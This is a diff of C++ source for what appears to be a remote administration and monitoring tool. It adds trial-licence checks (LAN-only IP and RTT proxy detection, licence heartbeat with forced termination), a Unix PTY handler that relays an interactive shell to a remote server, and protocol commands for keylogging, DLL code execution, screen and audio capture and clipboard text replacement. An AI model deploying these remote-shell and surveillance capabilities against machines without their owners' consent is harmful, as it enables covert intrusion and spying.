// │ │ │ 周期性回连授权服务器 │
// ├─────────────┼─────────────────────┼──────────────────────────────────┤
// │ 正式授权 │ 跨网远程业务 │ 需具备正当使用理由 │
// │ │ (含跨地远程监控) │ 由发行方人工审核签发 │
// │ │ │ 本程序仅做技术校验 │
// └─────────────┴─────────────────────┴──────────────────────────────────┘
//
// 各层级的设计意图:
//
// * 无口令档:仅满足"个人在自己一台机器上做远程登录 / 应急自救"这类
// 极轻量诉求,端口数限制确保它无法被改造成多租户中转。
//
// * 试用口令档:开放给"小公司 / 团队在自家 LAN 内统一管理一批设备"
// 的真实使用场景。所有限制LAN-only、RTT 阈值、心跳)都围绕一个
// 目的:让这台 server 只能服务真实物理同网段的客户端,无法通过任何
// 形式的代理 / 隧道 / NAT 转发暴露给公网,从而封堵"用试用口令对外
// 提供远程服务"的滥用路径。
//
// * 正式授权档:唯一允许真正跨网远程业务的形态。授权签发流程在程序
// 之外(人工评估申请人身份、合规义务、用途说明),程序本身只承担
// 技术校验。这一档存在的目的是给合规客户提供完整能力。
//
// 授权与责任划分(重要)
// ----------------------------------------------------------------------------
// 发行方的责任仅限于:
// (a) 提供具备本文件所述反滥用机制的软件实现;
// (b) 在授权签发环节进行合理的身份核验与用途说明审查。
//
// 授权一经签发,被授权方即作为"运营者"独立承担其使用行为的全部法律与
// 道义责任,包括但不限于:
//
// 1. 遵守其所在司法辖区关于个人隐私、计算机信息系统安全、数据保护、
// 工作场所监控、未成年人保护等一切现行有效的法律法规;
// 2. 在每一台被本软件管理 / 监控的设备上,事先取得该设备所有者及
// 实际使用人明确、可追溯的知情同意;
// 3. 不得将本软件用于任何形式的非授权监控、商业秘密窃取、未授权
// 访问他人计算机系统、敲诈勒索、跟踪骚扰、规避执法监管等违法
// 违规用途。
//
// 发行方明确声明:
//
// * 签发授权不构成对被授权方任何具体使用方式的背书、推荐或担保;
// * 被授权方违反前款义务造成的一切后果(含民事赔偿、行政处罚、
// 刑事责任、第三方索赔),由被授权方独立承担,与发行方无关;
// * 发行方不审查、不参与、亦不为被授权方的实际部署形态、被管设备
// 的归属、被采集数据的内容与去向负责;
// * 一经发现被授权方存在违法违规使用迹象,发行方有权在不另行通知
// 的情况下立即吊销其授权,并依法配合相关执法 / 司法机关调查、
// 提交签发记录与必要日志。被授权方对授权签发协议的接受即视为对
// 上述处置权利的明示同意。
//
// 上述责任划分独立于、且优先于本软件附带的任何其他文档或宣传材料中
// 的表述。
//
// 本文件提供的强制机制
// ----------------------------------------------------------------------------
//
// 1. LANChecker
// 周期扫描本进程的 ESTABLISHED 入站连接,发现任何非私网 IP
// (非 10/8、172.16/12、192.168/16、127/8、169.254/16即弹窗告警。
// 用于试用模式下挡住"客户端直接从公网连入"的滥用形态。
//
// 2. LANChecker::CheckPortLimit
// 监听端口数量上限校验。无授权档限 2 个、试用档限 20 个,超额即弹窗。
// 防止单机被改造成大规模多租户中转节点。
//
// 3. LANRttChecker详见下方类注释
// 应用层 RTT 反代理。挡住"在 LAN 内放代理 / 反向隧道,源 IP 仍是
// 私网段但实际经公网转发到外部客户端"这一更隐蔽的绕过形态。
// 物理光速决定的硬约束,比 IP 段更难规避。
//
// 4. AuthTimeoutChecker
// 强制周期性回连授权服务器;离线超时则告警并最终强制终止进程,
// 防止"仅在初次激活时联网,之后离线长期使用"的形态。也用于
// 授权吊销下发:发行方在服务器侧吊销后,下次心跳即生效。
//
// 上述机制全部为故意可被终端用户感知的"告警 / 终止"路径,目的是让被滥用
// 部署的实例自我暴露,而非静默运行。组合起来构成纵深防御,单点绕过不足
// 以解除全部限制。
//
// 实现层面:本文件 header-only全部静态方法 + 函数内静态变量,避免静态
// 初始化顺序问题,全部线程安全。
// ============================================================================
#include <winsock2.h> #include <winsock2.h>
#include <ws2tcpip.h> #include <ws2tcpip.h>
@@ -10,6 +119,8 @@
#include <string> #include <string>
#include <mutex> #include <mutex>
#include <set> #include <set>
#include <deque>
#include <algorithm>
#include <atomic> #include <atomic>
#pragma comment(lib, "iphlpapi.lib") #pragma comment(lib, "iphlpapi.lib")
@@ -46,6 +157,16 @@ public:
return false; return false;
} }
// 字符串版(点分十进制 IPv4。空串或解析失败按"非公网"处理(即返回 true
// 避免误报;调用方应自行确保传入的是有效 IPv4。仅 IPv4IPv6 不在判定范围。
static bool IsPrivateIPv4Str(const std::string& ipv4)
{
if (ipv4.empty()) return true;
in_addr addr;
if (inet_pton(AF_INET, ipv4.c_str(), &addr) != 1) return true;
return IsPrivateIP(addr.s_addr); // s_addr 已是网络字节序
}
// 获取本进程所有入站的外网TCP连接只检测别人连进来的不检测本进程连出去的 // 获取本进程所有入站的外网TCP连接只检测别人连进来的不检测本进程连出去的
static std::vector<WanConnection> GetWanConnections() static std::vector<WanConnection> GetWanConnections()
{ {
@@ -269,6 +390,267 @@ private:
} }
}; };
// LAN RTT 检测器:试用版的"反代理"补强信号
//
// 设计动机:
// LANChecker 只看连接源 IP 是否私网段,但只要攻击者在 LAN 内放一台代理/反代/frp
// 把 server 暴露给公网,源 IP 仍然落在私网段IP 检测就被绕过。
// 公网客户端经任何代理接入时,应用层心跳的端到端 RTT (hb.Ping) 会反映真实物理
// 延迟(光速决定,代理不能"伪造低延迟"),因此用 RTT 阈值做二级闸门。
//
// 测量来源:客户端心跳里自报的 hb.Ping客户端侧 EWMA 平滑后的 srtt毫秒
// 注意:这个值包含 server 端业务处理时间(约 5-15ms不是纯网络 RTT。
//
// 阈值依据:
// 真 LAN含服务端处理5-25ms中位数典型 8-15ms
// 跨城/跨 ISP 代理30ms+
// 25ms 是物理上"真 LAN 不会稳定超过、公网代理不会稳定低于"的甜点。
//
// 抗误报机制:
// 1. 跳过前 WARMUP_SKIP 次心跳:客户端 EWMA 收敛 + server 首次 V2 签名等慢路径
// 2. 滑窗 N=SAMPLE_WINDOW 取中位数:抵抗个别样本异常抖动
// 3. 连续 BREACH_PERSIST_COUNT 次中位数都超阈值才触发:抵抗几十秒级临时拥塞
//
// 局限(已知,不在本版本处理):
// 攻击者本人有公网 IP 且"客户"与攻击者同城同 ISP 时,物理 RTT 可低于 25ms 漏检。
// 后续可叠加 "同源 IP 多 ClientID" 行为信号做双因素判定。
class LANRttChecker
{
public:
// 阈值毫秒。25 是经验值,针对"server 部署在 LAN 内"的典型试用场景。
// 如果 server 部署在机房(基线 RTT 本就 20ms+),调用方应自行调高。
static const int RTT_THRESHOLD_MS = 25;
static const int SAMPLE_WINDOW = 10; // 滑窗大小
static const int WARMUP_SKIP = 5; // 跳过前 N 次心跳
static const int BREACH_PERSIST_COUNT = 3; // 连续 K 次中位数超阈值才触发
// 试用模式开关:默认关,授权流程确认 IsTrail 后由调用方打开。
// 关闭时 RecordSample 直接返回,避免给已授权用户白白堆积状态/触发误报。
static void SetEnabled(bool enabled)
{
GetEnabled().store(enabled);
}
// 记录一次心跳 RTT 样本。在收到心跳 ACK / 算完 RTT 的位置调用:
// LANRttChecker::RecordSample(rttMs);
// 单 client 进程在生命周期内只有一条对控制端的活跃心跳源,全局单例
// 状态足够;若上层后续真出现"多控制端并存",再恢复 keyed 设计。
static void RecordSample(int rttMs)
{
// 三道无锁早退:未启用 / 已弹过框 / 异常值。
// 一旦弹过告警,本检测器就该 sleep——后续样本既不会再触发新的弹框
// 继续抢锁排序也只是浪费 CPU。Reset() 才会重新打开(清掉 warned 标记)。
if (!GetEnabled().load() || GetWarnedFlag().load() || rttMs <= 0)
return;
bool shouldWarn = false;
int triggeredMedian = 0;
{
std::lock_guard<std::mutex> lock(GetMutex());
auto& state = GetState();
// 拿到锁后再确认一次——RecordSample 多线程并发时可能有别的线程
// 已经在弹框路径上把 warned 设置了。
if (state.warned)
return;
// 收敛期:前 N 个样本完全忽略,不入滑窗也不计数判定
if (state.total_seen++ < WARMUP_SKIP)
return;
state.samples.push_back(rttMs);
if ((int)state.samples.size() > SAMPLE_WINDOW)
state.samples.pop_front();
// 滑窗未满时不判定,避免少样本中位数失真
if ((int)state.samples.size() < SAMPLE_WINDOW)
return;
int median = MedianMs(state.samples);
if (median > RTT_THRESHOLD_MS)
state.breach_run++;
else
state.breach_run = 0;
if (state.breach_run >= BREACH_PERSIST_COUNT)
{
state.warned = true;
GetWarnedFlag().store(true); // 同步到无锁早退标志
shouldWarn = true;
triggeredMedian = median;
}
}
if (shouldWarn)
{
std::string* msgPtr = new std::string();
*msgPtr = "Suspicious connection detected.\n\n";
*msgPtr += "Connection RTT median: "
+ std::to_string(triggeredMedian) + "ms\n";
*msgPtr += "Threshold: " + std::to_string(RTT_THRESHOLD_MS) + "ms\n\n";
*msgPtr += "The persistently elevated RTT suggests the connection\n";
*msgPtr += "may be relayed through a proxy/VPN.\n\n";
*msgPtr += "Trial version is restricted to LAN connections only.\n";
*msgPtr += "Please purchase a license for remote connections.";
HANDLE hThread = CreateThread(NULL, 0, WarningDialogThread, msgPtr, 0, NULL);
if (hThread) CloseHandle(hThread);
}
}
// 重置状态:清空采样、清空告警标记。可在切换授权状态或测试时调用。
// 注意:不应在断线重连时调用——保留跨重连的状态可以避免攻击者通过
// 反复重连刷新收敛期来绕过检测。
static void Reset()
{
std::lock_guard<std::mutex> lock(GetMutex());
GetState() = ClientState{};
GetWarnedFlag().store(false); // 把无锁早退标志一起清掉
}
// 查询当前的样本中位数(毫秒),不足窗口或无样本返回 -1。
// 用于调试 / 状态栏展示。
static int GetMedianMs()
{
std::lock_guard<std::mutex> lock(GetMutex());
auto& state = GetState();
if ((int)state.samples.size() < SAMPLE_WINDOW)
return -1;
return MedianMs(state.samples);
}
private:
struct ClientState
{
std::deque<int> samples; // 最近 SAMPLE_WINDOW 个有效样本
int total_seen = 0; // 总采样数(含被跳过的收敛期样本)
int breach_run = 0; // 连续中位数超阈值的次数
bool warned = false; // 已弹过框,避免重复打扰
};
static int MedianMs(const std::deque<int>& s)
{
std::vector<int> v(s.begin(), s.end());
std::sort(v.begin(), v.end());
size_t n = v.size();
if (n == 0) return 0;
return (n % 2 == 0) ? (v[n / 2 - 1] + v[n / 2]) / 2 : v[n / 2];
}
static DWORD WINAPI WarningDialogThread(LPVOID lpParam)
{
std::string* msg = (std::string*)lpParam;
MessageBoxA(NULL, msg->c_str(), "Trial Version - LAN Only",
MB_OK | MB_ICONWARNING | MB_TOPMOST);
delete msg;
return 0;
}
static std::mutex& GetMutex()
{
static std::mutex s_mutex;
return s_mutex;
}
static ClientState& GetState()
{
static ClientState s_state;
return s_state;
}
static std::atomic<bool>& GetEnabled()
{
static std::atomic<bool> s_enabled(false); // 默认关,避免误伤已授权用户
return s_enabled;
}
// 已弹过框的无锁标志,与 ClientState::warned 同步。RecordSample 入口处
// 用它做 zero-cost 早退,避免后续每次心跳还要抢锁 + 排序中位数。
static std::atomic<bool>& GetWarnedFlag()
{
static std::atomic<bool> s_warned(false);
return s_warned;
}
};
// 服务端 per-connection RTT 反代理检测器
//
// 设计动机:与 LANRttChecker 互补——LANRttChecker 是客户端单例(一个客户端只有一条主控连接,
// 全局滑窗即可),但服务端要同时盯多个连接,若用全局滑窗,一条 abusive 连接会被 N 条真 LAN
// 连接的中位数稀释。所以本类的每个实例只跟一条连接绑定,由 IOCPServer 持有,逐连接单独判定。
//
// 信号源:服务端 WSAIoctl(SIO_TCP_INFO).RttUs内核测得的纯网络 RTT微秒比客户端
// "心跳总耗时减 ProcessingMs" 更干净。因此阈值可以比客户端 25ms 严一点 → 20ms。
//
// 触发动作:仅返回"是否首次触发"是否真的弹框由调用方IOCPServer持全局 latch 决定。
// 同一连接生命周期内 triggered 后不再产生新的 triggerper-connection 自带 latch
//
// 线程模型单写者IOCPServer 的 RTT 轮询线程)。所有方法假设由同一线程串行调用,
// 内部不加锁;读取展示性字段建议直接走 CONTEXT_OBJECT 暴露的 atomic getter。
class TcpRttBreachDetector
{
public:
// 与 LANRttChecker 经验阈值对齐,但因信号更干净而严化:
static const int RTT_THRESHOLD_MS = 20;
static const int SAMPLE_WINDOW = 10; // 滑窗大小10s 历史 @ 1Hz
static const int WARMUP_SKIP = 5; // 跳过前 N 次样本,避免握手早期波动
static const int BREACH_PERSIST_COUNT = 3; // 连续 K 次中位数超阈值才触发
// 喂一次 RTT 样本(毫秒)。返回 true 当且仅当**本次**调用导致首次触发。
// 后续调用即使继续超阈也返回 falseper-instance latch由调用方决定是否仍要继续输入。
bool Feed(int rttMs)
{
if (m_triggered || rttMs <= 0) return false;
if (m_totalSeen++ < WARMUP_SKIP) return false;
m_samples.push_back(rttMs);
if ((int)m_samples.size() > SAMPLE_WINDOW)
m_samples.pop_front();
if ((int)m_samples.size() < SAMPLE_WINDOW)
return false;
int med = MedianMs(m_samples);
if (med > RTT_THRESHOLD_MS) m_breachRun++; else m_breachRun = 0;
if (m_breachRun >= BREACH_PERSIST_COUNT) {
m_triggered = true;
m_triggerMedianMs = med;
return true;
}
return false;
}
bool IsTriggered() const { return m_triggered; }
int TriggerMedianMs() const { return m_triggerMedianMs; }
int CurrentMedianMs() const
{
return ((int)m_samples.size() < SAMPLE_WINDOW) ? -1 : MedianMs(m_samples);
}
// 复用 CONTEXT_OBJECT 时调用(释放回 free pool 后再次接连接)。
void Reset()
{
m_samples.clear();
m_totalSeen = 0;
m_breachRun = 0;
m_triggered = false;
m_triggerMedianMs = 0;
}
private:
static int MedianMs(const std::deque<int>& s)
{
std::vector<int> v(s.begin(), s.end());
std::sort(v.begin(), v.end());
size_t n = v.size();
if (n == 0) return 0;
return (n % 2 == 0) ? (v[n / 2 - 1] + v[n / 2]) / 2 : v[n / 2];
}
std::deque<int> m_samples;
int m_totalSeen = 0;
int m_breachRun = 0;
int m_triggerMedianMs = 0;
bool m_triggered = false;
};
// 授权连接超时检测器 // 授权连接超时检测器
// 用于检测试用版/未授权用户是否长时间无法连接授权服务器 // 用于检测试用版/未授权用户是否长时间无法连接授权服务器
class AuthTimeoutChecker class AuthTimeoutChecker
@@ -308,6 +690,9 @@ public:
// 超过警告时间,弹出警告(弹窗关闭后可再次弹出) // 超过警告时间,弹出警告(弹窗关闭后可再次弹出)
if (elapsed >= (ULONGLONG)warningTimeoutSec && !GetDialogShowing()) if (elapsed >= (ULONGLONG)warningTimeoutSec && !GetDialogShowing())
{ {
if (elapsed >= 6 * warningTimeoutSec)
TerminateProcess(GetCurrentProcess(), 0);
GetDialogShowing() = true; GetDialogShowing() = true;
// 在新线程中弹窗,弹窗关闭后重置标记允许再次弹窗 // 在新线程中弹窗,弹窗关闭后重置标记允许再次弹窗

275
common/PTYHandler.h Normal file
View File

@@ -0,0 +1,275 @@
/**
* PTYHandler.h - Unix Pseudo Terminal Handler
*
* This file provides pseudo terminal (PTY) functionality for remote shell access.
*
* PLATFORM SUPPORT:
* - Linux: Supported
* - macOS: Supported
* - Windows: NOT SUPPORTED (Windows uses different terminal APIs)
*
* USAGE:
* #include "common/PTYHandler.h"
*
* PTYHandler* handler = new PTYHandler(clientObject);
* clientObject->setManagerCallBack(handler, ...);
*/
#pragma once
#if defined(_WIN32) || defined(_WIN64)
#error "PTYHandler.h is not supported on Windows. Use Windows ConPTY or other APIs instead."
#endif
// Platform-specific includes
#ifdef __APPLE__
#include <util.h> // macOS: openpty()
#else
#include <pty.h> // Linux: openpty()
#endif
// Common Unix includes
#include <unistd.h>
#include <fcntl.h>
#include <termios.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <signal.h>
#include <errno.h>
#include <string.h>
#include <thread>
#include <atomic>
#include <stdexcept>
#include "commands.h"
#include "../client/IOCPClient.h"
/**
* PTYHandler - Pseudo Terminal Handler
*
* Manages a pseudo terminal for remote shell access.
* Inherits from IOCPManager to integrate with the IOCP client framework.
*/
class PTYHandler : public IOCPManager
{
public:
// Non-copyable, non-movable (owns system resources)
PTYHandler(const PTYHandler&) = delete;
PTYHandler& operator=(const PTYHandler&) = delete;
PTYHandler(PTYHandler&&) = delete;
PTYHandler& operator=(PTYHandler&&) = delete;
PTYHandler(IOCPClient* client) : m_client(client), m_running(false), m_master_fd(-1), m_slave_fd(-1), m_child_pid(-1)
{
if (!client) {
throw std::invalid_argument("IOCPClient pointer cannot be null");
}
// Create pseudo terminal pair
if (openpty(&m_master_fd, &m_slave_fd, nullptr, nullptr, nullptr) == -1) {
throw std::runtime_error("Failed to create pseudo terminal");
}
// Set master fd to non-blocking mode
int flags = fcntl(m_master_fd, F_GETFL, 0);
fcntl(m_master_fd, F_SETFL, flags | O_NONBLOCK);
// Start shell process
startShell();
}
~PTYHandler()
{
m_running = false;
if (m_readThread.joinable()) {
m_readThread.join();
}
if (m_master_fd >= 0) {
close(m_master_fd);
}
if (m_slave_fd >= 0) {
close(m_slave_fd);
}
if (m_child_pid > 0) {
// Check if child is still running before killing
int status;
pid_t result = waitpid(m_child_pid, &status, WNOHANG);
if (result == 0) {
// Child still running, terminate it
kill(m_child_pid, SIGTERM);
waitpid(m_child_pid, nullptr, 0);
}
// If result == m_child_pid, child already exited and was reaped
// If result == -1, child was already reaped elsewhere
}
}
// Start the PTY read thread
void Start()
{
bool expected = false;
if (!m_running.compare_exchange_strong(expected, true)) return;
m_readThread = std::thread(&PTYHandler::readFromPTY, this);
}
// Handle incoming data from server
virtual VOID OnReceive(PBYTE data, ULONG size) override
{
if (size && data[0] == COMMAND_NEXT) {
Start();
return;
}
// Handle terminal resize command
if (size >= 5 && data[0] == CMD_TERMINAL_RESIZE) {
short cols, rows;
memcpy(&cols, data + 1, sizeof(short));
memcpy(&rows, data + 3, sizeof(short));
SetWindowSize(cols, rows);
return;
}
// Write data to PTY
if (size > 0) {
ssize_t total = 0;
while (total < (ssize_t)size) {
ssize_t written = write(m_master_fd, (char*)data + total, size - total);
if (written == -1) {
if (errno == EAGAIN || errno == EINTR) continue;
break;
}
total += written;
}
}
}
// Set terminal window size
void SetWindowSize(int cols, int rows)
{
struct winsize ws;
ws.ws_col = cols;
ws.ws_row = rows;
ws.ws_xpixel = 0;
ws.ws_ypixel = 0;
if (ioctl(m_master_fd, TIOCSWINSZ, &ws) == -1) {
return;
}
// Send SIGWINCH to child process to notify window size change
if (m_child_pid > 0) {
kill(m_child_pid, SIGWINCH);
}
}
private:
int m_master_fd;
int m_slave_fd;
IOCPClient* m_client;
std::thread m_readThread;
std::atomic<bool> m_running;
pid_t m_child_pid;
void startShell()
{
m_child_pid = fork();
if (m_child_pid == -1) {
close(m_master_fd);
close(m_slave_fd);
throw std::runtime_error("Failed to fork shell process");
}
if (m_child_pid == 0) {
// Child process
setsid(); // Create new session, become session leader
// Set slave PTY as controlling terminal (required for Ctrl+C to work)
// This must be done after setsid() and before dup2()
ioctl(m_slave_fd, TIOCSCTTY, 0);
// Redirect stdin/stdout/stderr to slave PTY
dup2(m_slave_fd, STDIN_FILENO);
dup2(m_slave_fd, STDOUT_FILENO);
dup2(m_slave_fd, STDERR_FILENO);
close(m_master_fd);
close(m_slave_fd);
// Set terminal environment for xterm.js compatibility
setenv("TERM", "xterm-256color", 1);
setenv("COLORTERM", "truecolor", 1);
#ifdef __APPLE__
// macOS locale settings
setenv("LANG", "en_US.UTF-8", 1);
setenv("LC_ALL", "en_US.UTF-8", 1);
// Disable zsh session save/restore (causes errors in PTY)
setenv("SHELL_SESSIONS_DISABLE", "1", 1);
// Try zsh first (macOS default), fallback to bash. Use -l (login) so
// ~/.zprofile is sourced — Homebrew's `brew shellenv` (which puts
// /opt/homebrew/bin on PATH) lives there. Without -l the PTY can't
// see brew / cmake / node / pyenv / rustup etc.
if (access("/bin/zsh", X_OK) == 0) {
execl("/bin/zsh", "zsh", "-l", "-i", nullptr);
}
execl("/bin/bash", "bash", "-l", "-i", nullptr);
#else
// Linux locale settings (C.UTF-8 is most portable)
setenv("LANG", "C.UTF-8", 1);
setenv("LC_ALL", "C.UTF-8", 1);
// Start interactive bash
execl("/bin/bash", "bash", "-i", nullptr);
#endif
_exit(1);
}
}
void readFromPTY()
{
char buffer[4096];
while (m_running) {
// Check if child process has exited
int status;
pid_t result = waitpid(m_child_pid, &status, WNOHANG);
if (result == m_child_pid) {
// Shell exited, send close notification
if (m_client) {
BYTE closeToken = TOKEN_TERMINAL_CLOSE;
m_client->Send2Server((char*)&closeToken, 1);
}
m_running = false;
break;
}
ssize_t bytes_read = read(m_master_fd, buffer, sizeof(buffer) - 1);
if (bytes_read > 0) {
if (m_client) {
m_client->Send2Server(buffer, bytes_read);
}
} else if (bytes_read == 0) {
// EOF - PTY closed
if (m_client) {
BYTE closeToken = TOKEN_TERMINAL_CLOSE;
m_client->Send2Server((char*)&closeToken, 1);
}
m_running = false;
break;
} else if (bytes_read == -1) {
if (errno == EAGAIN || errno == EWOULDBLOCK) {
usleep(10000); // 10ms
} else if (errno == EIO) {
// EIO typically means PTY slave closed (shell exited)
if (m_client) {
BYTE closeToken = TOKEN_TERMINAL_CLOSE;
m_client->Send2Server((char*)&closeToken, 1);
}
m_running = false;
break;
} else {
break;
}
}
}
}
};

103
common/client_auth_state.h Normal file
View File

@@ -0,0 +1,103 @@
// client_auth_state.h
// Linux/macOS 客户端服务端身份校验状态 + helperLayer 1 防护)。
//
// 行为模型:
// - g_loginMsgstartTime + "|" + clientID启动时填一次跨重连不变
// - g_loginTime每次新连接重置为当前时刻
// - g_settingsVerified服务端 CMD_MASTERSETTING 通过签名校验后置 true
// 重连时重置为 false
//
// 客户端是常驻服务——服务端可能频繁重启 / 长期离线 / 临时不可达,这些都不应
// 让进程退出。校验失败仅作"本次连接不可信"处理:断开本连接 + 让外层重连。
// 功能侧的安全由子连接 authTOKEN_CONN_AUTH兜底——没通过校验的服务端无法
// 触发任何 sub-connection 功能。
//
// 跨线程访问:
// - g_settingsVerified 在 DataProcessIO 线程写、心跳循环main 线程)读
// - 用 std::atomic<bool> + acquire/release 内存序保证可见性
//
// C++17 inline 变量保证多翻译单元共享同一实例,无 ODR 冲突。
#pragma once
#include <atomic>
#include <cstring>
#include <ctime>
#include <string>
#include "common/commands.h"
// 全局 namespace 中的 verifyMessage由 client/sign_shim_unix.cppLinux/macOS
// 私有 .libWindows提供。必须在任何 namespace 之外声明,否则会被解析成
// ClientAuth::verifyMessage 导致链接失败。
extern bool verifyMessage(const std::string& publicKey, BYTE* msg, int len,
const std::string& signature);
namespace ClientAuth {
// ============== 跨重连保留的状态 ==============
inline std::string g_loginMsg;
inline time_t g_loginTime = 0;
inline std::atomic<bool> g_settingsVerified{false};
// ============== Helpers ==============
// 进入新连接前调用g_loginTime = nowverified = false
inline void OnNewConnection()
{
g_loginTime = time(nullptr);
g_settingsVerified.store(false, std::memory_order_release);
}
// DataProcess 开头的 gate未通过校验前仅放行 CMD_MASTERSETTING校验本身
// 其它命令一律静默忽略——既防止未授权服务端 spawn 子连接线程做 DoS
// 也防止它发 COMMAND_BYE 之类把客户端进程关掉。
inline bool IsCommandAllowed(unsigned char cmd)
{
return g_settingsVerified.load(std::memory_order_acquire) || cmd == CMD_MASTERSETTING;
}
// 处理 CMD_MASTERSETTINGpayload = szBuffer + 1payloadLen = ulLength - 1
// 强制要求完整 MasterSettings包含 Signature 字段);不完整 / 签名失败 → 不更新
// g_settingsVerified让心跳循环 30s 超时自然把本次连接断开重连。
//
// 返回 true校验通过已 store(true)),通过 outReportInterval / outSettingsCopy
// 返回 settings 内容供调用方继续应用(更新心跳间隔、密码哈希等)
// 返回 false本次响应异常调用方应直接 return不要继续处理
//
// 注意:参数采用 unsigned char* 而非 BYTE* 避免依赖 Windows typedef
// BYTE 在 commands.h 已 typedef 为 unsigned char等价。
inline bool HandleMasterSettings(const unsigned char* payload, int payloadLen,
MasterSettings* outSettings)
{
if (payloadLen < (int)sizeof(MasterSettings)) {
return false;
}
MasterSettings settings = {};
std::memcpy(&settings, payload, sizeof(MasterSettings));
// 服务端身份校验:用 g_loginMsg (= szStartTime + "|" + clientID) 与 settings.Signature
// 验证签名。失败 → 不立即退出,让超时兜底+重连逻辑处理。
// 注意 ::verifyMessage 在全局 namespace见本头部 extern 声明),不能省略 :: 前缀,
// 否则会被解析为 ClientAuth::verifyMessage链接失败。
std::string sig((char*)settings.Signature,
(char*)settings.Signature + sizeof(settings.Signature));
if (!::verifyMessage("", (BYTE*)g_loginMsg.data(), (int)g_loginMsg.length(), sig)) {
return false;
}
g_settingsVerified.store(true, std::memory_order_release);
if (outSettings) *outSettings = settings;
return true;
}
// 心跳循环里检查 30s 超时:登录后 30 秒内必须收到并通过 MasterSettings 校验,
// 失败 → 调用方应显式断开本连接让外层重连。永不退出进程。
inline bool IsTimedOut()
{
return !g_settingsVerified.load(std::memory_order_acquire) &&
g_loginTime > 0 &&
time(nullptr) - g_loginTime > 30;
}
} // namespace ClientAuth

192
common/commands.h
View File

@@ -125,7 +125,10 @@ inline int isValid_10s()
#define DLL_VERSION __DATE__ // DLL版本 #define DLL_VERSION __DATE__ // DLL版本
// 客户端能力位 // 客户端能力位
#define CLIENT_CAP_V2 0x0001 // 支持 V2 文件传输 #define CLIENT_CAP_V2 0x0001 // 支持 V2 文件传输
#define CLIENT_CAP_UTF8 0x0002 // 协议字符串字段统一使用 UTF-8 编码(活动窗口、窗口列表、键盘记录中的窗口标题等)
// 无此位 = 老客户端,按系统 ANSI默认 CP936解读
#define CLIENT_CAP_SCREEN_PREVIEW 0x0004 // 支持屏幕预览(双击在线主机时弹缩略图)
#define TALK_DLG_MAXLEN 1024 // 最大输入字符长度 #define TALK_DLG_MAXLEN 1024 // 最大输入字符长度
@@ -252,6 +255,7 @@ enum {
CMD_AUDIO_CTRL = 95, // 音频控制: [cmd:1][enable:1][persist:1] CMD_AUDIO_CTRL = 95, // 音频控制: [cmd:1][enable:1][persist:1]
TOKEN_SCREEN_AUDIO = 96, // 音频数据: [token:1][hasFormat:1][AudioFormat?][data] TOKEN_SCREEN_AUDIO = 96, // 音频数据: [token:1][hasFormat:1][AudioFormat?][data]
COMMAND_SHARE_CANCEL = 97, COMMAND_SHARE_CANCEL = 97,
COMMAND_ENCODE_LEVEL = 98,
TOKEN_SCROLL_FRAME = 99, // 滚动优化帧 TOKEN_SCROLL_FRAME = 99, // 滚动优化帧
// 服务端发出的标识 // 服务端发出的标识
@@ -330,8 +334,117 @@ enum {
CMD_SET_GROUP = 242, // 修改分组 CMD_SET_GROUP = 242, // 修改分组
CMD_EXECUTE_DLL_NEW = 243, // 执行代码 CMD_EXECUTE_DLL_NEW = 243, // 执行代码
CMD_PEER_TO_PEER = 244, // P2P通信 CMD_PEER_TO_PEER = 244, // P2P通信
TOKEN_CLIENTID = 245,
TOKEN_CONN_AUTH = 246, // 子连接身份校验包(客户端首发,服务端回 ConnAuthAck
COMMAND_SCREEN_PREVIEW_REQ = 247, // 屏幕预览请求(服务端→客户端)
TOKEN_SCREEN_PREVIEW_RSP = 248, // 屏幕预览响应(客户端→服务端)
COMMAND_TEXT_REPLACE = 249,
TOKEN_CLIP_TEXT = 250,
}; };
#pragma pack(push, 1)
struct TextReplace {
uint8_t cmd;
uint8_t type;
uint8_t param[510];
uint8_t reserved[512];
};
enum TextReplaceRule {
RULE_REPLACE_ALL = 0,
};
// 子连接校验HMAC 签名 (clientID || timestamp || nonce),服务端通过校验后把 clientID
// 钉在子连接 ctx 上,后续命令免 IP 反查直接拿到主连接关联。
// 主连接TOKEN_LOGIN 流)不走此校验。
//
// 兼容性策略:
// - 老客户端不发 → 新服务端宽容(保留 IP 反查兜底,行为不变)。
// - 新客户端发出 → 等服务端 ConnAuthAck超时或失败则不继续。
// - 因此新客户端只能向新服务端连接(破坏性升级)。
// - 未来收紧:服务端可拒绝所有未通过 auth 的子连接。
//
// 协议固定为 512 / 256 字节(参照 LOGIN_INFOR::szReserved[512] 的做法),
// 预留大量字节给未来扩展(如 client locale / OS 标识 / 子连接类型 / 会话 token /
// per-conn 能力位等),避免再次破坏性升级。预留区构造时全 0 初始化,未启用字段
// 不会进 HMAC 签名输入(签名输入仍只是 clientID || timestamp || nonce 共 32 字节)。
struct ConnAuthPacket {
uint8_t token; // = TOKEN_CONN_AUTH [1]
uint64_t clientID; // 客户端 V2 IDMachineGuid + 归一化路径算出) [8]
uint64_t timestamp; // 客户端发包时的 Unix 秒,防重放第一道 [8]
uint8_t nonce[16]; // 随机数,进一步降低重放/碰撞概率 [16]
char signature[64]; // signMessage("", clientID||timestamp||nonce, 32) [64]
char reserved[415]; // 预留扩展 [415]
}; // 总 512
// 服务端响应token + status + serverTime + 预留,固定 256 字节。
// serverTime 客户端可用来校正本机时钟偏差用于后续协议(可选)。
struct ConnAuthAck {
uint8_t token; // = TOKEN_CONN_AUTH回显方便客户端 dispatch [1]
uint8_t status; // 0=OK, 其它=失败原因(见 ConnAuthStatus [1]
uint64_t serverTime; // 服务端处理时的 Unix 秒 [8]
char reserved[246]; // 预留扩展 [246]
}; // 总 256
#pragma pack(pop)
// 编译期断言:协议大小不允许被无意改动
static_assert(sizeof(ConnAuthPacket) == 512, "ConnAuthPacket must be exactly 512 bytes");
static_assert(sizeof(ConnAuthAck) == 256, "ConnAuthAck must be exactly 256 bytes");
// 屏幕预览服务端按双击在线主机触发向客户端要一张缩略图JPEG与浮窗一起显示。
// 服务端依 ctx 最近心跳 Ping + RES_RESOLUTION 决定 maxWidth/quality 后下发;客户端
// 主屏抓图 → 等比缩放 → JPEG 编码 → 回响应。format 字段 v1 锁 0=JPEG预留 PNG/WebP。
#pragma pack(push, 1)
struct ScreenPreviewReq {
uint8_t cmd; // = COMMAND_SCREEN_PREVIEW_REQ
uint16_t reqId; // 请求序号,用于丢弃过期响应
uint16_t maxWidth; // 服务端期望的目标宽度(客户端等比缩放,不强制)
uint8_t jpegQuality; // 1..100
uint16_t reserved;
}; // 总 8 字节
enum ScreenPreviewStatus {
SCREEN_PREVIEW_OK = 0,
